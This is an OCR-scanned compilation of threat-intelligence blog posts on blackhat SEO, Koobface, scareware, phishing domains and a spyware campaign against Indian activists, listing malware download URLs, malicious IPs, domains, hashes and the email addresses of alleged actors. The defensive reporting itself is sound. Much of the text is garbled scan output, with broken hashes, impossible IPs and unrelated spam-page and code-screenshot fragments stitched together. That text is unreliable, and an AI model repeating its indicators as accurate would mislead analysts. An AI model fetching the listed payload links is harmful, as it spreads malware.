Dynamic redirectors from r-cg100609 .com/go/?pid=30455 &type=videxp on per session 


basis: 

92.255.131 .217/pid=30455/type=videxp/?ch= &ea= 
92.255.131 .217/pid=30455/type=videxp/setup.exe 
76.229.152 .148/pid=30455/type=videxp/?ch= &ea= 
76.229.152 .148/pid=30455/type=videxp/?ch= &ea=/setup.exe 
189.97.106 .121/pid=30455/type=videxp/?ch= &ea= 
189.97.106 .121/pid=30455/type=videxp/setup.exe 
117.198.91 .99/pid=30455/type=videxp/?ch= &ea= 
117.198.91 .99/pid=30455/type=videxp/setup.exe 
79.18.18 .29/pid=30455/type=videxp/?ch= &ea= 
79.18.18 .29/pid=30455/type=videxp/setup.exe 
85.253.62 .53/pid=30455/type=videxp/?ch= &ea= 
85.253.62 .53/pid=30455/type=videxp/setup.exe 
79.164.220 .170/pid=30455/type=videxp/?ch= &ea= 
79.164.220 .170/pid=30455/type=videxp/setup.exe 
59.98.1004 .129/pid=30455/type=videxp/?ch= &ea= 
59.98.104 .129/pid=30455/type=videxp/setup.exe 
78.43.24 .211/pid=30455/type=videxp/?ch= &ea= 
78.43.24 .211/pid=30455/type=videxp/setup.exe 
62.98.63 .254/pid=30455/type=videxp/?ch= &ea= 
62.98.63 .254/pid=30455/type=videxp/setup.exe 
84.176.74 .231/pid=30455/type=videxp/?ch= &ea= 
84.176.74 .231/pid=30455/type=videxp/setup.exe 
panmap _ .in/htm|/3003/25ee551429fcbfd75fe7bcfeba4a9cb8/ - 114.80.67.32 
card@googlemail.com 
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Se) Sclution WebSocket_ Test’ (2 project 
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# My Project 
*@ References 
¥) App.cortig 
&© Formi.ve 
WebdSocket_Test 
F My Project 
> ©@ References 
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> EE Forint 
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cc) | Spotity Harvester » Mecrosoft Visual Studho (Admarestrater) = Pe GO xX 
File Edt View Project Build Oebvg Team Took Test Anslyze Window Help Sgnin 
°o- 2-faels4 Debug * Any CPU - D Stet ~ ‘? x. 


= Spotty Harvester =|) Spotty Macvester.Core Login =1@ checki 
sing Systes; 
g Systee.Collections.deneric; 


using 


+ Spotity Harvester by HarveyS007 - cracked by darklS000 for crecked.to 
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No Comments 
by Jewellery News Jewellery Jewelry Diamond on 2009 
Jewelery - jeweky jewelery sapphare jewellery parem diamond jewelry adver jeweky jewelery wholesalers wholesale jewellery mourts bead jewerly news. Jewelry news -jeweBery related nformation news 


Diamcod wedding rings: earrings; pendants and necklaces press chppings. ¢-boutique, bespoke jewellery, contact us; news ethical & bespoke jewellery ingle & rhode offers the finest. Cibjo launches jewelry 
tetaders reference guide israel diamond portal all news articles diamond world magarine, plutoniem aed eraniem precious seetal india for a jewellery connoisseur, the exhibition offers a 


News; markets; personal finance; ifotech, jobs; opmon: features which went for rs lakh, a suite of ruby and diamond jewelry sales of scrap jewellery gain pace as gold sparkdes. Jewels by euros - estate 
jewelry sale alberta (calgary ) traros has fine jewellery, ex-bovfriends jewelry Gamond & gemstone rings about us advertise with us canadian news 


Jewellery pits the origns of jewellery the woed jewellery is that matches the color of her dress or a small diamond to we can give some special occastion gifts to her Eke jewelry. News rss jewellery jewelry 
jewel in the world by ¢35- jewelry wholesale coloeed mrconia beacelet kama jewellery taissa meBssa diamond jewelry 


(Cocnact celtic-jewellery celic- site map please sign ow guestbook foe news and offers Bamond jeweky. Pokshed diamond emports in japan fell by *s in march, pared to the same period last year japanese 
people choose to spend less on havary ®ems duc to the ongoing. 


The news feeds on this site are independently provided by could challenge the traditional consumer favourite of diamcod jewellery this christmas, cow acetone reise diamond riegs the latest sarvey by the 
jeweky. 


Jewelery news headiines pearl jewelry designs these dinys have ¢ more diverse patterns We the teardkop, stick, square, heart, sturdy strong metal bose reel diamond 


News alerts database a kind of indian manufacturer exporter of dian wadtional jewellery, diamond jewelry. Earrings. hoop earrings), how to manage your jewelry Gamond sets (inckan bridal jewellery, 
wedding & bridal jewelry indian Gamond industry, industry news - middle cast, jewellery shopping. news & updates. 


Ramy jewelry: rebean jewellery (hk) imited wing hang diamond co, td wing wo hing jewellery factory id to hong kong news. Uk jewellery top uk jewelry news information news about uk jewellery: ) foxy 5 
sexy ) Gamond jeweky valuation made easy - diamond jewelry valuation made easy 


When you think of diamond rings oturwa does ¢ to your head first choose from these comawa jewellery (jeweky. Trade fai services: news exhibinces from the field of Gamond, pearl, platinum, gold, siver, antique 
jewellery, pearls intemational watch & jeweky guld-las. 


mitment ams to reinforce consumer and stakeholder confidence in Gamond and gold jewellery news & media click bere for the latest rjc statements and news updates. Handmade jewelery, gold jewellery, 
Gamond jewelery here you wil find thousands of jeweky articles on everything related to jewellery recent news View news archive 


Jewellery, gem, jewelry, diamond, siver, plastic disposable chamspagee glass gold sem, stones go to top of page top of page jewelex -. august, jewellery news asia. page can choose p es 


Jewelery news 2 is also the most Enpoetant show for the jeweky Gamond talk news. Jewellery home: shopping jewellery other great news “one day one deal * get the best deals on the on online 


Diamond jewellery havary diamonds wedding rings, engagement jewellery (jewelry in american engish) is any piece of fme jewellery news. Jewellery, pold jewellery, auto glass sanford florida diamond 
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The served setup.exe (Win32/Koobface.BC; Worm:Win32/Koobface.gen!D;) samples phone 


back to a single location:- upr15may .com/achcheck.php; upri5may .com/Id/gen.php - 
92.38.0.69; 61.235.117 .71/files/pdrv.exe 


To further demonstrate the group’s involvement in these campaigns, two active campaigns 
at is-the-boss.com indicate that they’re also using the newly introduced counteringate.com, 
however, parked on the same IP as a previously analyzed redirector maintained bot the group. 


A sample campaign is using the engseo .net/sutra/in.cgi?4 &parameter=bravoerotica 
- 84.16.230.38 - Email: popkadyp@gmail.com as well as the warwork_ .info/cgi- 
bin/counter?id=945706 &k=independent &ref= - 91.207.61.48 redirectors to load free- 
porn-video-free-porn .com/1/index.php?q=bravoerotica - 84.16.230.38 - Email: pop- 
kadyp@gmail.com serving [14]a fake codec, and is also using the universal counter serving 
maintained by group counteringate .com/count.php?id=308. 
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A second sampled campaign at is-the-boss.com points to a new domain that is once again 
parked at a well known [15]IP mainted by the gang - goldeninternetsites .com/go.php?id=2022 
&key=4c69e59ac &pP=1 - 83.133.123.140 - known from [16]previous campaigns. 


The redirectors lead to anti-virussecurity3 .com - 69.4.230.204; 69.10.59.34; 83.133.115.9; 
91.212.65.125 with more typosquatted "[17]Personal Antivirus" scareware parked at these 
multiple IPs aimed to increase the life cycle of the campaign: 
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Personal Antivirus then phones back to startupupdates .com - 83.133.123.140 where more 
scareware is parked, with the domains known from previous campaigns: 
bestwebsitesin2009 .com 

live-payment-system .com 

bestbuysoftwaresystem .com 

antiviruspaymentsystem .com 

bestbuysystem .com 

homeandofficefun .com 

advanedmalwarescanner .com 
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primetimeworldnews .com 
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momentstohaveyou .cn 

worldofwarcry .cn 

awardspacelooksbig .us 


The affected services have been notified, blacklisting and take down of the participating 
domains is in progress. 


This post has been reproduced from [18]Dancho Danchev’s blog. 


1. http: //ddanchev. blogspot .com/2009/04/massive-blackhat-seo-campaign-serving. html 


2. http: //ddanchev. blogspot. com/2009/06/from-ukrainian-blackhat-seo-gang-with.htm 
3. http: //ddanchev. blogspot . com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


4. 
5. http://ddanchev. blogspot. com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 

6. 
7. http://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_16.html 
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17. http: //www.virustotal.com/analisis/50f£23f314bd40d05bfed00a042da936f 98f f e7af 81d52777a795275955a40ec6- 12452 
18. http://ddanchev. blogspot .com/ 
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5.6.10 A Peek Inside the Managed Blackhat SEO Ecosystem (2009-06-24 14:21) 


| am a7 year black hat SEO expert 
and have created over 10 information 


products including 


Ever wondered how are thousands of bogus accounts across multiple Web services, automat- 
ically generated with built-in monetization channels consisting of scareware, malware to the 
use of legitimate affiliate links from major ad networks? 


Through several clicks or if complete automation and experience count, through outsourcing 
the process to a managed blackhat SEO provider that wouldn’t charge you for the product, 
but for the service offered. Let’s take a peek at some of the currently available DIY tools, and 
what a managed blackhat SEO service provider has to offer. 
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Take for instance the "professional blackhat SEO" expert featured here. His ongoing [1]Twitter 
spam campaigns are in fact so successfully [2]hijacking trending topics that at first they 
looked like your typical scareware serving campaign. What both sides have in common are 
spamming techniques used. 


f= 3S 


However, the tactics vary and indicate an interesting shift from the typical [3]outsourcing of 
CAPTCHA recognition for the purpose of storing the blackhat SEO content on the legitimate 
provider’s services. In order to scale more efficiently, several currently active managed 
blackhat SEO providers that have vertically integrated to the point where they manage their 
own blackhat SEO friendly ISP. 
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By doing so, their bogus account generating platforms are capable of achieving speeds 
that would be otherwise either impossible or impractical to set as objectives through out- 
sourced CAPTCHA-recognition - 2,931 bogus Wordpress accounts with template based blackhat 
SEO content generated in 1 second using their own managed infrastructure. The following 
screenshots provide an inside peek into one of the products offered by the "professional 
blackhat SEO expert" : 
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Nikon Coolpix 860 10MP Camera, Nikon Coolpix $210 8MP Camera, Nikon 
Coolpix P60 10MP Camera, Nikon Coolpix L168 8MP Camera, Nikon Coolpix 
P90 12MP Camera, Nikon Coolpix 8630 12MP Camera, Nikon Coolpix 8220 
10MP Camera, Nikon Coolpix 8550 10MP Camera, Nikon Coolpix $700 SMP 
Camera, Nikon Coolpix L11 6MP Camera, Nikon Coolpix $51 6.1MP Camera, 
Nikon Coolpix 852 9MP Camera, Nikon Coolpix L100 10MP Camera, Nikon 
Coolpix 8230 10MP Camera, Nikon Coolpix 8560 10MP Camera, Nikon 
Coolpix 4300 4MP Camera, Nikon Coolpix 8710 14.5MP Camera, Nikon 
Coolpix $200 S.1MP Camera, Nikon Coolpix 8700 6MP Camera, Nikon 
Coolpix L4 4MP Camera, Nikon Coolpix 5400 S.1MP Camera, Nikon Coolpix 
L3 S.1MP Camera, Nikon Coolpix 3200 3.2MP Camera, Nikon Coolpix 5600 
a 5.1MP Camera, Nikon Coolpix 5000 SMP Camera, Nikon Coolpix 995 3.2MP 
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Digital Cameras and Accessories 
CATEGORIES = Waset : : _, Get More Resu 
. fenter Search lenr 
® Canon EOS Digital Cameras | 
© Canon Powershot Digha Free Canon EositDs Mark Ill camera Catalog ‘Search Now| 


The best camera I ha 
Takes excellent pectu 
Canon cameras and t 
disappointed with... 


Fuji FinePix Digital Cameras 
© HP PhotoSmart Digital Cameras | have used this lens for a while now ... since 10/07, and I recently scratched it on 
ek Easys Digital a hike up a volcano. Now I have to replace it, and I will probably go with the 1S e 


Cameres version (or whatever they call it at Tamron) It's a really nice little lens, and the T wanted something t 

OSC- T700 screen be 

© Nikon CoolPix Digital Cameras problems desenbed im the reviews I've read overstate the issues aouren 
since I carry it... 


Here are a couple of pics taken with this lens on a 4oD.[..] . 
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@ Nikon Digital Cameras 


© Olympus Digital Cameras 


© Clyenpus Stytes Dighal Cameras CANON EOS 1DS MARK III. 3 LENS SHOOTERS KIT soma, seat 
®@ Panasonic Lumix Digital NEW sDs IIT average 200m, easy.. 
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What took place in one second, was the generation of thousands of bogus accounts with 
descriptive blackhat SEO subdomains, with the bogus content pulled/scrapped from legitimate 
and real-time news providers, with the entire operation run as a managed service, or the tool 
itself offered for sale. As in every other managed underground service, customization plays 
a major role that is often the key benchmark for judging a particular product next to another. 
Customization in respect to this particular tool comes under the form of numerous Wordpress 
templates that can be randomly used during the registration process: 
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Static customization is one thing, dynamic customization is entirely another. The product, 
and consequently the managed service are offering the ability to automatically add Ebay and 
Amazon listings with the user’s unique affiliate code posted within the bogus content: 
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18.6.23 DDanchev is for Hire! - Who Wants to Hire Me in Europe? (2022-06-27 19:04) 


[1] 
23703 


Folks, 


After a decade of fighting bad guys I’ve decided to finally look for a way to relocate and be- 
gin a fresh start in my professional security blogger/cybercrime researcher/OSINT analyst and 
threat intelligence analyst career path by seeking a permanent position anywhere in Europe 
from anyone who’s interested in directly hiring me and offering relocation and accommodation 
assistance on a short notice where | can basically relocate and begin the position without a 
period of three days prior to signing a contract and receiving the necessary relocation and ac- 
commodation assistance and let’s not forget that someone should meet me at the airport and 
Say hi. 


The current situation: 
- I’m based in Bulgaria holding a Bulgarian citizenship 


- I’m willing to relocate anywhere in Europe for a security blogger/cybercrime researcher/OSINT 
analyst and threat intelligence analyst position 


- | work primary using email which is dancho.danchev@hush.com where you can reach me 24/7 
and expect a brief response three hours prior to sending your message 


- My CV is available as [2]PDF here and here’s my [3]LinkedIn Profile just in case you need it 
for anything 


My requirements: 


- |need only a direct hire proposition where you’re 100 % sure that you’re interested in working 
with me 


- | need a contract in advance before | travel on a short notice approximately three days prior 
to signing the contract 


- | need relocation assistance in the form of an airplane ticket including accommodation assis- 
tance where | need a place to crash work and live in your country 


How to approach me: 
Send me an email at dancho.danchev@hush.com and I'll shortly get back to you to discuss 


Looking forward to receiving your email. Let’s make this happen! 


1. https://blogger . googleusercontent .com/img/b/R29vZ2x1/AVVvXsEhRMd1E1qdXLaf8J8r3zEUq95h1F 1X jXkL- afbET8UBDJNm 
Lk3cB7audXwWbDc4youzn8m90conQY7Nt4JTceghsxD6_tajviZBCM 


2. http: //disruptive-individuals.com/wp-content/uploads/2021/11/Dancho_Danchev_CV_2021.pdf 


3. https: //linkedin.com/in/ddanche 


18.6.24 Exposing an Indian Police Spyware Cyber Operation that Fabricated Ev- 
idence on the PCs of Indian Activists - An OSINT Enrichment Analysis 
(2022-06-27 22:01) 


[1] 
23704 


From: Jennifer Gonzales <jennifergonzales789@gmail.com> 
Date: Sat, 26 Oct, 2019, 15:38 

Subject: Reminder Summons For Rioting Case 

To: < 


Jennifer Gonzales 
Special Public Prosecutor, Jagdalpur 


This is what happens when you’re cheap. Guess which are the major loCs (Indicators of 
Compromise) in this cyber attack campaign featured on [2]Wired.com? Keep reading this 
OSINT enrichment analysis and find out the actual true Indicators of Compromise. 


Sample Gmail accounts known to have been involved in the campaign include: 
jagdish.meshraam@gmail.com 

drsnehapatil64@gmail.com 

sinhamuskaan04@gmail.com 

jennifergonzales789@gmail.com 

payalshastri79@gmail.com 

Sample malicious domains known to have been involved in the campaign: 
researchplanet.zapto.org 

socialstatistics.zapto.org 

duniaenewsportal.ddns.net 


Sample domain registrant email address accounts known to have been involved in the cam- 
paign include: 


harpreet.singh1984@yahoo.com 
marlenecharlton@outlook.com 
abadaba@eml.cc 
REUBEN123@RISEUP.NET 
Related malicious domains known to have been involved in the campaign include: 
hxxp://greenpeacesite.com 
hxxp://new-agency.us 
hxxp://chivalkarstone.com 
hxxp://newmms.ru 
hxxp://gayakwaad.com 
23705 


hxxp://bbcworld-news.net 
hxxp://newsinbbc.com 


Sample responding IPs for known malicious domains known to have been involved in the 
campaign: 


208.48.81.179 
36.86.63.182 
64.15.205.100 
64.15.205.101 
198.105.254.11 
167.160.46.164 
208.48.81.134 
209.99.40.223 
185.205.210.23 
5.1.82.106 
69.195.129.70 
69.195.129.72 
104.239.213.7 
146.112.61.106 
52.4.209.250 
141.8.224.134 
216.120.146.200 
141.8.224.126 
192.154.103.67 
34.246.254.156 
72.52.179.174 
199.59.242.153 
199.59.243.220 
199.59.240.200 
75.2.122.238 
217.26.70.230 
192.64.147.152 
103.254.155.203 
208.73.211.250 
8.5.1.33 
91.217.90.201 
166.78.106.200 
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98.124.245.24 
146.148.34.125 
8.5.1.49 
54.210.47.225 
109.236.90.147 
199.191.50.21 
199.59.243.200 
185.82.202.155 
185.117.66.188 
185.117.74.47 
185.117.74.28 
185.45.193.14 


Sample malicious MD5s known to have been involved in the campaign include: 


619c707672fc36279f7983f95387e5fdcaff56c58620b23e6dc47dd200add9b7 
7533597d2ed0a0e2b981ae1b0d79a37d5343fe790bc3116e036b9b8f3d6b3fes 
22d72a14a1c9837d1c57b9393e88dee4cf21a98eb446008393ac04afa3edc712 
5d28df67b12a990af0300120747c8606604c22c6959d31c8706ff8040175414a 
18f9e34af21f5b5186e4c6367b86d268fcf0ec41e0879d06bbb9d0ef5c4dc3a2 
4dbb14ff2836733b34594956c4234d2a54c04257710dd31a0884b1926d35d7bc 
e€179f03dd608b090bec933fa62d3714b6deda6c1629eec6bf82f2df55aa22307 
e6dal12f819a7f50608b1f6al6f1dd6c08c906cd060244cbble5b0eb9ab5e75b5 
828de55ffbfb1clbéffcbb56b838486dbaecc9b41a0d111fcca290978ed05e95 
76970287697bb7601970bcd5d5cfa60e1c6558b60046501b885d203eda9c9b44 
99131b4fdedbf01721eed38ad685a305140feb73a6d0fb8cc48flfad3143be92 
221dde812ab1c734cd308da2ed8ead6033c6772864d383317fa2526a58e803ae 
f6b4f5f05907caf6eaf58109500144d69a798f17 7f6ac3cb32648fadb304192c 
5ede813e52c325fec54d1d8cb9e6b63118f64fce0585c1da4263cbf4a00e1651 
4fbb4leefb0e8a99417c855038bd7c89cc3190c07e0d4b4106d8ddbcf2634774 
94fa3ff2efl4ae0fcd461c89f90deae5ed6417a238ec5131ef6cb80400de0586 
261f13f9e6d08869b41dca972016f17 7elcefada9155d806a18f590c3f487a5f 
ca2f1df3639a5b5896d98aa70eb68507abflceababa8fe054671cdd0711faf9e 
095ec879f323a0a3eceb97013125880d49ac701eef568e3b010fdddb1333941f 
11cef331557eb693e718d27b6a7211a98d3982117a03ec1491db8098ea3cec00 
16b5c74fb55f52ae0ae4328f65b2bf3bbe3e5ee34268c1d32a247a0aldfa3186 
21d24e08889f75461a7ce6f21fc612a701bca35dala218cf3cdd6e23f613bb4d 
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31a3e3aba03b553d0f23f10b06ade30ae053cd667a8cc9660f310705ee471b68 
5a4aca57541954195953066a4be96dfb19776ba099d7 2f8f1d3677581594606e 
88b92d985b7d616c93c391731c1e4a6d3c8323fdcbf31cfc4d340e27253913a7 
ac4d5d938009fd44b2f7587986862ab2278887a17d32f748278445b625b3efd9 
b09ca9d48a0455ed5e02a56aabeb397c41fb63320244719749e0741da72e79c4 
b1b6e133aa320669c772ec7e5fd6fboe4cb3edcal3ad5351f14df3c1f13939d09 
de302a61e5f07b0e65753355d44d22181a2742ac3a92aa058bdcd00cc4dab788 
e3dea449bf74434ee1c9cdc04ca68b8Ff3c9bac357768e07df303433f257d3b9a 
ea5f37elfeab670171963aa83b235c772202b2d4bb7289dd45302c3851dbd6f9 
Stay tuned! 


1. https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgfrc9711TdWkuw0PspI9yFa_rq6cwthqA4shst-nCUcck16 
XqixTsdE6TWii8HsbLEV2VCp8txpcWNJjcp_PrYTyImsV9XtzqCad 


2. https: //www.wired.com/story/modified-elephant-planted-evidence-hacking-police/ 


18.6.25 Is Koobface Botnet’s Master KrotReal Back in Business? Try the Adult Enter- 
tainment Industry First! (2022-06-28 15:42) 


[1] 


© © © © © 


Remember the [2]Koobface botnet and the "[3]Koobface Botnet Master KrotReal Back in Busi- 
ness, Distributes Ransomware And Promotes BHSEO Service/Product" post? 
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I’ve decided to dig a little bit deeper using my own techniques and methodology and actually 
attempt to find additional information on KrotReal’s online whereabouts as of 2022 in terms of 
malicious and fraudulent activities and | found evidence of several new domain registrations 
using his original krotreal@gmail.com personal email which | originally profiled and exposed in 
my original [4JOSINT analysis back in 2012. 


Sample domains known to have been involved in the campaign include: 
hxxp://mob-vids.com 
hxxp://mob-dating.net 
hxxp://xerotic-mob.com 
hxxp://kinozal3d.com 
hxxp://xmob-erotic.com 
hxxp://uploadfile.asia 
hxxp://mljsprivate. biz 
hxxp://xmusic-mp3.com 
hxxp://tube4mob.com 
hxxp://mob-ka-next.com 
hxxp://mobcelebrity.net 
hxxp://mobcelebrity.org 
hxxp://mob-dating.com 
hxxp://mob-dating.org 
hxxp://forfriends.rest 
hxxp://xxxfreewebcams.com 
hxxp://huahin.rent 
hxxp://vrwebcam.site 
hxxp://peretrax.com 
hxxp://thcars. biz 
hxxp://mobile-sexy. biz 
hxxp://adult-redirect. biz 
hxxp://homexxxvids.net 
hxxp://nomexxxvids.info 
hxxp://vip-redir.com 
hxxp://homexxxvids.com 
hxxp://sabaishop.net 
hxxp://holopoker.online 
hxxp://thai-pills.com 
hxxp://searches.online 
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hxxp://android-igru.biz 
hxxp://rusx.mobi 
hxxp://horomob.org 
hxxp://erotic-mobile.com 
hxxp://horomob.com 
hxxp://horomob.net 
hxxp://mob-ka.com 
hxxp://salosbros.com 
hxxp://horomob. biz 
hxxp://mtswapservice.com 
hxxp://online-kinoteatr. biz 
hxxp://mobile-vista.org 
hxxp://mp3prosto.com 
hxxp://prostofiles.com 
hxxp://eromfpre.com 
hxxp://x-onlinekino.com 
hxxp://z-erovideo.com 
hxxp://z-kinozal3d.com 
hxxp://getgdz.net 
hxxp://v2mlicelery.com 
hxxp://good-erotic.org 
hxxp://nice-erotic.org 
hxxp://super-erotic.org 
hxxp://amazing-erotic.org 
hxxp://perfect-erotic.org 


hxxp://cool-erotic.org 
23710 


Sample personal email address accounts known to have been involved in the campaign: 
arkano@arkano.ru 

contact@biddx.com 

tinnakorn _khu@hotmail.com 

mrpinkesq@yahoo.com 

krotreal@gmail.com 

inf@outlook.co.th 

2@2220.com 


Stay tuned! 


1. https: //blogger. googleusercontent .com/img/b/R29vZ2x1/AVVXsEj-tgBFxNhcEj6SOoVjIs8pgxI-fwR7PQVqkRvCfV9Mq- gkP 


2, hetpe://adanchev. blogepot .con/2012/01/hos-behind-kocbface-botnet~orint. hall 
3, hetps://ddanchev. blogspot .con/2012/11/koobface-botnet-naster-krotreal~back- sa, heal 
4. https: //Adanchev blogspot .com/2012/01/shos-behind-koobface-botnet-osint 
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18.6.26 Bogus "Shocking Video" Content at Scribd Exposes Malware Monetization 
Scheme Through Parked Domains (2022-06-28 18:50) 


By decree ix <pemes INswe + = EI [Gor 


OIL RIG EXPLOSION 


WATCH THIS HOT VIDEO >> 


Bogus content populating Scribd, centralized malicious/typosquatted/parked do- 
mains/fraudulent infrastructure, combined with dozens of malware samples phoning back to 
this very same infrastructure to monetize the fraudulently generated traffic, it doesn’t get any 
better than this, does it? 


URL redirection chain: 

hxxp://papaver.in/shocking/scr68237 -> hxxp://dsnetservices.com/?ep!=98EbooDNw_Lit- 
gQViA4tbYD7Z/JMZAQuUEUyV387pMY NBODms0CdAg9qAe5QvBgKT O6xW6jHW1iYo5F8yDIvYx 
7Aavd8wLHMmZWHDIItbG4Eta-GVti03i9LInzyKOYgWmT2BOaEeaipahFIE8yB7MC - 
EBrQzXXtQBVUSIMGIEwTo9iUpOlyDUOM 
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Nope ne yamtng Totem pape 


Y ano’ Amazon 
listings merGeo 


with Your Cooled 
Qe Tiiae links 


bdo 
=> uniqwe Comments 
‘ ‘omatical|y 
ee Gererate? ano’ 
Pesteo! 
pete & 


OmZKYzSpf6qGIAAGYN _vvwAA4H8BAABAgFsLAADgPokxWVMmWUExNmhaQqA AAADw -> 
monetization through Google/MSN 


Ej Adc Note (a) Link < >Embec PR Seve for eter + — fl [1 Jor 


GLENN BECK RALLY ATTENDANCE: 


UNCENSORED VIDEO!! I'M SHOCKED 


Uncensored shocking video of 
ew 6. mm —« OS 


WATCH THIS HOT VIDEO >> 


Domain names reconnaissance: 

papaver.in - 69.43.161.176 - Email: belcanto@hushmail.com - Belcanto Investment Group 
dsnetservices.com - 208.73.211.152 - Email: admin@overseedomainmanagement.com - 
Oversee Domain Management, LLC 
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www_scribd.com/doc/37114664/bieach-rangiku-hentai-shocking-video * 
Apr 28, 2013 - BLEACH RANGIKU HENTAI - SHOCKING VIDEO! - Free download or 


readfalse online for free 


www. scribd .com/doc/.../noah-wyle-separates-from-wife-shocking-video * 
Apr 28, 2013 - NOAH WYLE SEPARATES FROM WIFE - SHOCKING VIDEO! - Free 
download as PDF File (pdf), Word Doc (.doc), Text File (txt) or read online ... 


- Sen 


www. scribd .com/doc/37126294/pokemon-dawn-hentai-shocking-video ~ 
Apr 28, 2013 - POKEMON DAWN HENTAI! - SHOCKING VIDEO! - Free download as 
POF File (pdf), Word Doc (.doc), Text File (txt) or read online for free 


www.scribd.com/doc/.../akshay-kumar-nude-naked-shocking-video ~ 
Apr 28, 2013 - AKSHAY KUMAR NUDE - NAKED - SHOCKING VIDEO! - Free 
download as Word Doc (.doc), Text file (txt), PDF File (pdf) or read online for ... 


www.scribd.comy.../bleach-free-bieach-ichigo-bleach-e-hentai-tagged-sh... * 


Apr 28, 2013 - BLEACH FREE BLEACH ICHIGO BLEACH E-HENTA! TAGGED - 
SHOCKING VIDEO! - Free download or readfalse online for free 


www.scribd.com/doc/37117078/bieach-hentai-english-shocking-video ~ 
Apr 28, 2013 - BLEACH HENTAI ENGLISH - SHOCKING VIDEO! - Free download or 


readfalse online for free 


www .scribd.com/doc/37117012/bleach-hentai-cartoon-shocking-video ~ 
Apr 28, 2013 - BLEACH HENTAI CARTOON - SHOCKING VIDEO! - Free download as 
POF File (pdf), Word Doc (.doc), Text File (txt) or read online for free 


www.scribd.com/doc/.../adrien 


-brody-nude-naked-shocking-video ~* 


Apr 28, 2013 - ADRIEN BRODY NUDE - NAKED - SHOCKING VIDEO! - Free downloac 


or readfalse online for free. 


HAY! 


- Scri 


www.scribd.com/doc/.../akshaye-khanna-nude-naked-shocking-video + 
Apr 28, 2013 - AKSHAYE KHANNA NUDE - NAKED - SHOCKING VIDEO! - Free 


download or readfalse online for free 


The following related domains are also 


canto@hushmail.com): 
4cheapsmoke.com 
777payday.com 
aboutforexincome.com 
agroindusfinance.com 
atvcrazy.com 
bbbamericashop.com 
bizquipleasing.com 
cashforcrisis.com 
cashmores-caravans.com 
cashswim.com 
cheapbuyworld.com 
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registered with the same email 


(bel- 


cheaptobbacco.com 
cheapuc.com 
debtheadaches.com 
debtonatorct.com 
gcecenter.com 
goldforcashevents.com 
studioshc.com 
thestandardjournal.com 
travelgurur.com 
atlanticlimos.net 
bethelgroup.net 
caravanningnews.net 
casting-escort.net 
cheapersales.net 
couriernetwork.net 
dragonarttattoo.net 
girlgeniusonline.net 
madameshairbeauty.net 
manchester-escort.net 
mygirlythings.net 
vocabhelp.net 
cheapmodelships.com 
financialdebtfree.com 
mskoffice.com 
cashacll.com 
apollohealthinsurance.com 
nieportal.com 
playfoupets.com 
wducation.com 
carwrappingtorino.net 
crewealexultras.net 
diamondsmassage.net 
isleofwightferries.org 
migliojewellery.org 
mind-quad.org 
moneyinfo.us 
2daysdietslim.com 
999cashlline.com 
capitalfinanceome.com 
capitlefinanceone.com 
captialfinanceone.com 
carehireinsurance.com 
cashadvaceusa.com 
cashadvancesupprt.com 
cashdayday.com 
cashgftingxpress.com 
cashginie.com 
cashsoltionsuk.com 
cathayairlinescheapfare.com 
cheapaddidastops.com 
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cheapaparmets.com 
cheapariaoftguns.com 
cheapcheapcompters.com 
cheapdealsinmalta.com 
cheapdealsorlando.com 
cheapeestees.com 
cheapetickete.com 
cheapeygptholidays.com 
cheapfaresairlines.com 
cheap-flighs.com 
cheapflyithys.com 
cheapfreestylebmx.com 
cheapgoldjewelery.com 
cheaphnoels.com 
cheapholidaysites.com 
cheaphotellakegeorge.com 
cheaplawnbowls.com 
cheapm1lalairsoft.com 
cheapmetalsticksdiablo.com 
cheapmpwers.com 
cheapmsells.com 
cheapotickeds.com 
cheapottickets.com 
cheapprotien.com 
cheapryobicordlesstools.com 
cheap-smell.com 
cheapsmellscom.com 
cheapsmes.com 
cheapsscents.com 
cheapstockers.com 
cheapsummerdresser.com 
cheaptents4sale.com 
cheaptertextbooks.com 
cheaptikesps.com 
cheaptrainfairs.com 
cheaptstickts.com 
cheaptunictops.com 
cheapuksupplement.com 
cheapversaceclothes.com 
cheapviagra4u.com 
cliutterdiet.com 
cocheaptickets.com 
dailcheapreads.com 
dcashstudious.com 
debtinyou.com 
diabetesdietsplans.com 
dietaetreino.com 
dietcetresults.com 
dietcheff.com 
dietdessertndgos.com 
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dietemaxbrasil.com 
dietopan.com 
discoveryremortgages.com 
dmrbikescheap.com 
ferrrycheap.com 
financeblogspace.com 
firstleasingcompanyofindia.com 
firstresponcefinance.com 
forexdirecotery.com 
forexfacdary.com 
foreximegadroid.com 
forextrading2u.com 
jitzcash.com 
insanelycheapfights.com 
insurancenbanking.com 
inevenhotel.net 
islamic-bank.us 
italyonlinebet.com 
m3motorsite.com 
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®@ SECURITY GUARDS AGENCIES 


~ It Security 

Security Camera www.Sulekha.com 

~ Computer Security 

~ Computer SECURITY CAMERAS 
» Email Security 

~ Home Security System www.Alibaba.com/Security-Cameras 
* Spyware Protection 

= Internet Software SECURITY SERVICES 
* Scanner 

~ Cusco Roster www.relyonfacility.com 
SECURITY JOBS 


indeed.co.in/Security 
® SECURITY GUARD REMOVAL 
CleanAllSpyware.com 
® ETHERNET ENCRYPTORS 


www.Senetas-Europe.com 


Out of the hundreds of domains known to have phoned back to the same IP in the past, the 
following are particularly interesting: 

motors.shop.ebay.com-cars-trucks-9722711.1svvo.net 
motors.shop.ebay.com-trucks-cars-922.1svvo.net 

paupal.it 

paypa.com.login.php.nahda-online.com 

paypal-secure.bengalurban.com 
paypal.com-cgi.bin-webscr.cmd.login.submit-dispatch.5885d80a.13cOdb1f8.e263663. d3fa- 
ee. 38deaa3.e263663.login.submit.3.webrocha.com 
paypal.com-cgi.bin-webscr.cmd.login.submit-dispatch.5885d80a.13cOdb1f8.e263663. d3fa- 
ee. 38deaa3.e263663.login.submit.4.webrocha.com 
paypal.com.update.service.cgi.bin.webscr.cmd.login-submit.modernstuf.com 
paypal.com.update.service.cgi.bin.webscr.cmd.login.submit.modernstuf.com 
paypal.com.us.cgi-bin.webscr-cmd.login-run.dispatch.5885d80a13c0db1f8e263663d3f - 
aee8d43b1bb6cabed6aee8d43b16cv27bc. 

darealsmoothvee.com 

paypal.it.bengalurban.com 


Malicious MD5s known to have made HTTP (monetization) requests to the same IP 
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(69.43.161.176): 


MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
